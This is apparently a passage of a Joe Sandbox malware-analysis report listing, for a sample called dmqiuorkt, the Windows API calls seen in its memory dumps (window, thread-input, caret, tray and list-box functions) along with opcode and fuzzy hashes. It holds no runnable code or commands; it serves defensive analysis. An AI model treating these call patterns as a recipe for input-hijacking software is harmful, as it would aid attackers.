                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3321077145-0
                                                                                                                                                                            • Opcode ID: 6e0c035fe377c9e5c4909f763befecf98cc7f6ccff095c72c2dd77751c891603
                                                                                                                                                                            • Instruction ID: c23cbbfa76b7b3f0c32800580427046bdd7bd0b94769f9a02955cfb482eaab3f
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e0c035fe377c9e5c4909f763befecf98cc7f6ccff095c72c2dd77751c891603
                                                                                                                                                                            • Instruction Fuzzy Hash: 05411835600610DFCB11AF18C445A5EBBF2FF49311B198099EC4AAB362CB34FD49CB92
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 008E204A
                                                                                                                                                                              • Part of subcall function 008B42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 008B42E6
                                                                                                                                                                              • Part of subcall function 008B42CC: GetCurrentThreadId.KERNEL32 ref: 008B42ED
                                                                                                                                                                              • Part of subcall function 008B42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008B2E43), ref: 008B42F4
                                                                                                                                                                            • GetCaretPos.USER32(?), ref: 008E205E
                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 008E20AB
                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 008E20B1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2759813231-0
                                                                                                                                                                            • Opcode ID: 21feea8989fd801323003f9434f023e160c585b6e288ab223298c8d11f4acfbb
                                                                                                                                                                            • Instruction ID: a15c842382d7eca0f5f1fbfea3868f620fb3c9ba6f638e1bda08dba64fd28384
                                                                                                                                                                            • Opcode Fuzzy Hash: 21feea8989fd801323003f9434f023e160c585b6e288ab223298c8d11f4acfbb
                                                                                                                                                                            • Instruction Fuzzy Hash: 36311071D00249AFC704DFAAC881CAEB7FCFF58304B5084AAE415E7252D671DE45CB91
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00854154: _wcslen.LIBCMT ref: 00854159
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008BE7F7
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008BE80E
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008BE839
                                                                                                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 008BE844
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3763101759-0
                                                                                                                                                                            • Opcode ID: 3cc82b71118a12d4a3427dc1a9356c5624fb9206014dc676bcd81034a2cc8f3c
                                                                                                                                                                            • Instruction ID: 818076ce809c1e2215e6654ed33c1720249924905e9961c7935d85c15c6b4d30
                                                                                                                                                                            • Opcode Fuzzy Hash: 3cc82b71118a12d4a3427dc1a9356c5624fb9206014dc676bcd81034a2cc8f3c
                                                                                                                                                                            • Instruction Fuzzy Hash: 04219171D00614AFCB119FA8C981BEEB7B8FF85350F148065E808EB385D670DE418BA2
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 008B960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,008B8199,?,000000FF,?,008B8FE3,00000000,?,0000001C,?,?), ref: 008B961B
                                                                                                                                                                              • Part of subcall function 008B960C: lstrcpyW.KERNEL32(00000000,?,?,008B8199,?,000000FF,?,008B8FE3,00000000,?,0000001C,?,?,00000000), ref: 008B9641
                                                                                                                                                                              • Part of subcall function 008B960C: lstrcmpiW.KERNEL32(00000000,?,008B8199,?,000000FF,?,008B8FE3,00000000,?,0000001C,?,?), ref: 008B9672
                                                                                                                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,008B8FE3,00000000,?,0000001C,?,?,00000000), ref: 008B81B2
                                                                                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,008B8FE3,00000000,?,0000001C,?,?,00000000), ref: 008B81D8
                                                                                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,008B8FE3,00000000,?,0000001C,?,?,00000000), ref: 008B8213
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                            • String ID: cdecl
                                                                                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                                                                                            • Opcode ID: 330381a97c8ad927c5d775358cd51374b6e37c518701f8f2ee641922a6c2a045
                                                                                                                                                                            • Instruction ID: 41cb9777ca813f33f4d1cfa519475632f1d679774e480cbd986b1b6c7e24a21a
                                                                                                                                                                            • Opcode Fuzzy Hash: 330381a97c8ad927c5d775358cd51374b6e37c518701f8f2ee641922a6c2a045
                                                                                                                                                                            • Instruction Fuzzy Hash: 5D11E63A200346EFCB145F78D885ABA77A9FF99350B50402AF946CB360EF71D801C7A1
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008E866A
                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 008E8689
                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 008E86A1
                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008CC10A,00000000), ref: 008E86CA
                                                                                                                                                                              • Part of subcall function 00852441: GetWindowLongW.USER32(00000000,000000EB), ref: 00852452
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Window$Long
• String ID:
• API String ID: 847901565-0
• Opcode ID: 4b5072b3cbaea5bdd0d562cf0d654660e7cfb08884cec68cebc5e9da13c831f9
• Instruction ID: b271c56049fccf529b406a88088928fc4188703a1b4e63226ada7281eb456cfe
• Opcode Fuzzy Hash: 4b5072b3cbaea5bdd0d562cf0d654660e7cfb08884cec68cebc5e9da13c831f9
• Instruction Fuzzy Hash: 1111AC32504299EFCB109F6ADC48AAA3BA5FB56374F114724F939DB2F0DB308951DB90
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 05d1e02fa0426bd3f7565bfcaa432eb3c7626cc8b16e36d5a3423a397db6a3fc
• Instruction ID: 144796497cb39e9e8e4ca5894b6ffdb2eb018a54db0c09c46fc4bdefd6a2855e
• Opcode Fuzzy Hash: 05d1e02fa0426bd3f7565bfcaa432eb3c7626cc8b16e36d5a3423a397db6a3fc
• Instruction Fuzzy Hash: C801ADB620A61A7EF621367C6CC5F27774DFF523B8B310326F621E51D1EA609C418761
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 008B22D7
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 008B22E9
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 008B22FF
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 008B231A
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 9c9a059abd5a0b78e5e78cc155750b823b84e4dd85b2410b8340ea640e6cb543
• Instruction ID: cbe40c3e9fa183117fe31d207e44be74a556cf357eb636d7aa540f9d9b4ca37d
• Opcode Fuzzy Hash: 9c9a059abd5a0b78e5e78cc155750b823b84e4dd85b2410b8340ea640e6cb543
• Instruction Fuzzy Hash: 6211093A900218FFEB119BA5CD85FDDFBB8FB08750F200091EA00B72A0D671AE10DB94
APIs
  • Part of subcall function 00852441: GetWindowLongW.USER32(00000000,000000EB), ref: 00852452
• GetClientRect.USER32(?,?), ref: 008EA890
• GetCursorPos.USER32(?), ref: 008EA89A
• ScreenToClient.USER32(?,?), ref: 008EA8A5
• DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 008EA8D9
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: c05139ef1e1b8dc39cb63c5d7aa8b3a77491abd02a242ec00d81f78b128c2b71
• Instruction ID: b34d0a521c37014a4a7feb568ddba78255a3d5b33188617eafa3e23116331df2
• Opcode Fuzzy Hash: c05139ef1e1b8dc39cb63c5d7aa8b3a77491abd02a242ec00d81f78b128c2b71
• Instruction Fuzzy Hash: 071125729001A9FBDF189F99D8859EE77B8FB06700F000466E911EA150D730BA86CBA2
APIs
• GetCurrentThreadId.KERNEL32 ref: 008BEA29
• MessageBoxW.USER32(?,?,?,?), ref: 008BEA5C
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008BEA72
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008BEA79
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: 2c2417ba50d00e10a639791f719d064c1ff383156e313c0dd95661d58c9ebcc1
• Instruction ID: 693e53f38ee082b33f800734327505e27941097b2884552523db1db3cafa1413
• Opcode Fuzzy Hash: 2c2417ba50d00e10a639791f719d064c1ff383156e313c0dd95661d58c9ebcc1
• Instruction Fuzzy Hash: B411E1769082A8BFC711EBA89C45ADA7FADFB45320F00821AF824E7391D274890487A1
APIs
• GetWindowRect.USER32(?,?), ref: 008E8792
• ScreenToClient.USER32(?,?), ref: 008E87AA
• ScreenToClient.USER32(?,?), ref: 008E87CE
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E87E9
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: e8880f547b8a38460b029065cae307f8068bc51c5799aee31d94ec34fafde271
• Instruction ID: c720a01c951270f58cec03084c91932483eeae29d08c8f691541876bb44cb272
• Opcode Fuzzy Hash: e8880f547b8a38460b029065cae307f8068bc51c5799aee31d94ec34fafde271
• Instruction Fuzzy Hash: EB1142B9D00249EFDB41CFA9C884AEEBBF5FB18310F108166E915E7220D735AA54CF90
APIs
• GetSysColor.USER32(00000008), ref: 0085216C
• SetTextColor.GDI32(?,?), ref: 00852176
• SetBkMode.GDI32(?,00000001), ref: 00852189
• GetStockObject.GDI32(00000005), ref: 00852191
Similarity
• API ID: Color$ModeObjectStockText
• String ID:
• API String ID: 4037423528-0
• Opcode ID: 8e0ba7a77f14f8025fc9b8f28fb7f23e63dea8766dfb543f9bff8c4496a39a9e
• Instruction ID: 78eb614ef03f7976db1150dabe5ebe178c8dce66483a5d70b6d32b2adbb422e8
• Opcode Fuzzy Hash: 8e0ba7a77f14f8025fc9b8f28fb7f23e63dea8766dfb543f9bff8c4496a39a9e
• Instruction Fuzzy Hash: D2E06532240780AEDB215B74AC497D97B21FB12336F048219F6BA8C0E0C77246449B10
APIs
• GetDesktopWindow.USER32 ref: 008AEBD6
• GetDC.USER32(00000000), ref: 008AEBE0
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 008AEC00
• ReleaseDC.USER32(?), ref: 008AEC21
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: d0070474dba005ca35cfec7dbe387aa60bfa269d5f4e945c9b4b8ae110f46879
• Instruction ID: 0e76b876efa7ad73a3ec93d977d881b5a352a1a1e7f02491c0a708cfc41c5b86
• Instruction Fuzzy Hash: 28E01AB5800305DFCF50AFA08848A6DBBB1FB58311F15844AE84AEB220CB398949DF54
APIs
• GetDesktopWindow.USER32 ref: 008AEBEA
• GetDC.USER32(00000000), ref: 008AEBF4
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 008AEC00
• ReleaseDC.USER32(?), ref: 008AEC21
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 9ad119bba9d7bbf60672f30ac1cba3fc1c62f56a805e87033fff3ebd33f94852
• Instruction ID: 4a7ceeca776bd9d89f1c62112382b655b759c7f49be27c5fe6352529f86b7e05
• Instruction Fuzzy Hash: 3AE01AB5800304DFCF509FB0884865DBBB1FB58311F158449E909EB220CB395909DF40
APIs
• __startOneArgErrorHandling.LIBCMT ref: 0087E69D
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: f715650ddfcb16cd90e2eaf1ffdccfb0713b5e2579511c2b74a5284a9976d5df
• Instruction ID: a9c76dcb3b511c794781f42d6ee3fae420d906e3ff88aa7c57d49b96f9842937
• Instruction Fuzzy Hash: B6515761A08106D6CB15B728DD4577A3BA4FB24740FB0CA98E099C62BDEF34CC96DB46
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID:
• String ID: #
• API String ID: 0-1885708031
• Opcode ID: 8bd7c4e1de67dd3fe0859871e5ee5985de9b5882e92278bac1448effffc3abdd
• Instruction ID: a596db1bf12585377ce365f87d9d9f523b23e8c6867acf07c21062e749e97c31
• Instruction Fuzzy Hash: 5551443050524ACFEF19DF28C480ABA7BA1FF1A314F254055ECA1EB290DB349D46CB76
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: BuffCharUpper_wcslen
• String ID: CALLARGARRAY
• API String ID: 157775604-1150593374
• Opcode ID: 730035aedddb9d7b163078e73b63ff500bb7ef7cfa9b01df96bf1df08b75ccae
• Instruction ID: 90adffe1d98b9adf1cd262081b7e701e85d58f77578f7306e2a185d2048d477c
• Instruction Fuzzy Hash: A841BE71A002199FCF04DFA8C8818AEBBB5FF58320F14412AE806E7352EB709D95CF90
APIs
  • Part of subcall function 0085771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00857759
  • Part of subcall function 0085771B: GetStockObject.GDI32(00000011), ref: 0085776D
  • Part of subcall function 0085771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00857777
• GetWindowRect.USER32(00000000,?), ref: 008E40D9
• GetSysColor.USER32(00000012), ref: 008E40F3
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: 726f88b0732de35e66baf9d16111660bd801741ca83b91d21a48596b7c024691
• Instruction ID: 5c89adbe960ac046d6530069bc11aaa0370bc99d0b48a35d5345d0aa8230762f
• Instruction Fuzzy Hash: 4F112672610249AFDF00DFA9CC46AEA7BB8FB09314F005924F959E7250E675E851DB60
APIs
  • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
  • Part of subcall function 008B4536: GetClassNameW.USER32(?,?,000000FF), ref: 008B4559
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008B25DC
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: f4dc39b90c242d285a3dd131306dfe24ccd8ef84cdee6e197ae131c253ce7f56
• Instruction ID: cfcc850e96dd34c5eec76dc6680acad56eb6307bb7dfb81433643f4201d7f37c
• Opcode Fuzzy Hash: f4dc39b90c242d285a3dd131306dfe24ccd8ef84cdee6e197ae131c253ce7f56
• Instruction Fuzzy Hash: AB01B57164422DABCB24EBA8CC51CFE7774FF66310B040619A862D73D6EA30980C9661
APIs
  • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
  • Part of subcall function 008B4536: GetClassNameW.USER32(?,?,000000FF), ref: 008B4559
• SendMessageW.USER32(?,00000180,00000000,?), ref: 008B24D6
Strings
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 7b954bbd4eae86726fad4b91d29f83e7ed2c1cef64abb9b36bdcf28f9d0cb4b2
• Instruction ID: b1e7d150b446e37482d68fc7711c3ac5a0f36993ecda0f143f60427f996807c4
• Opcode Fuzzy Hash: 7b954bbd4eae86726fad4b91d29f83e7ed2c1cef64abb9b36bdcf28f9d0cb4b2
• Instruction Fuzzy Hash: 98018471A44109ABDB28EBA8C852AFF77A8FF55344F1400196912E73C2DA549E0CC676
APIs
  • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
  • Part of subcall function 008B4536: GetClassNameW.USER32(?,?,000000FF), ref: 008B4559
• SendMessageW.USER32(?,00000182,?,00000000), ref: 008B2558
Strings
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 5da2041d314eff16c31b5565cb9f4dd64c6f371a9d0e234ee50877bcdcd22f9f
• Instruction ID: 6dcfac9979766991a7b7d54aa19e9c80d3ce3c6ec17f35d9dd4249181238d7c4
• Opcode Fuzzy Hash: 5da2041d314eff16c31b5565cb9f4dd64c6f371a9d0e234ee50877bcdcd22f9f
• Instruction Fuzzy Hash: 4301A271A44109A7CB25EBA8C952AFE77A8FB25740F1400157802E7382EA249E0CC672
APIs
  • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
  • Part of subcall function 008B4536: GetClassNameW.USER32(?,?,000000FF), ref: 008B4559
• SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 008B2663
Strings
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 623564f30464d6cce23ac29cef788f5b396842329a91329548a09b7da901585b
• Instruction ID: 9d30cffd274f1bce39ef8ff0a5cb9fe6589091033891ca32d96b5f60e6ffae9c
• Opcode Fuzzy Hash: 623564f30464d6cce23ac29cef788f5b396842329a91329548a09b7da901585b
• Instruction Fuzzy Hash: 33F08171A8421DA6CB24E7A88C52FFE7778FB21714F040A15B862E73C6DA64580D8261
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008E2C8B
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008E2C9E
  • Part of subcall function 008BF1A7: Sleep.KERNEL32 ref: 008BF21F
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 768ff38370c5985faf30b0b43f62e226c0a8ee96ccf4ab14660a60d5ce4b7e06
• Instruction ID: 14d9b7ac366011c25a2706f61126665b9e5783e77de93e4b70581be5640bf8d1
• Opcode Fuzzy Hash: 768ff38370c5985faf30b0b43f62e226c0a8ee96ccf4ab14660a60d5ce4b7e06
• Instruction Fuzzy Hash: 5CD012393C4390BBF668B774DC4FFD67B54BB90B14F0008157749AE1D1C9E06844C6A4
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008E2CCB
• PostMessageW.USER32(00000000), ref: 008E2CD2
  • Part of subcall function 008BF1A7: Sleep.KERNEL32 ref: 008BF21F
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 344746b20b8f1a27e71b72c0409b81cc88ca9a8eb929cc4f1302ebffa9699114
• Instruction ID: 7ecbda3befcbf8bd565f712caaa4649820bb248f71386f9f02df37ac989776e8
• Opcode Fuzzy Hash: 344746b20b8f1a27e71b72c0409b81cc88ca9a8eb929cc4f1302ebffa9699114
• Instruction Fuzzy Hash: 4BD0C9353C53906AF668B774DC4FFC66A54BB94B14F4008157745AE1D1C9A0684486A8
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0088C233
• GetLastError.KERNEL32 ref: 0088C241
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0088C29C
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1717984340-0
                                                                                                                                                                            • Opcode ID: e5b1b2af8b1a41bdd4d13473aed7c41e001651ad362e2c2a1e5aa0e4eca9038d
                                                                                                                                                                            • Instruction ID: 700c16c5a4a96653f6a507dda70e6c67d89c64c146d37250cbd493c9564e696d
                                                                                                                                                                            • Opcode Fuzzy Hash: e5b1b2af8b1a41bdd4d13473aed7c41e001651ad362e2c2a1e5aa0e4eca9038d
                                                                                                                                                                            • Instruction Fuzzy Hash: 7F41B83160024AEFCB31AFE9C844AAA7BA5FF45710F148169F959EB1E9DB308D01C771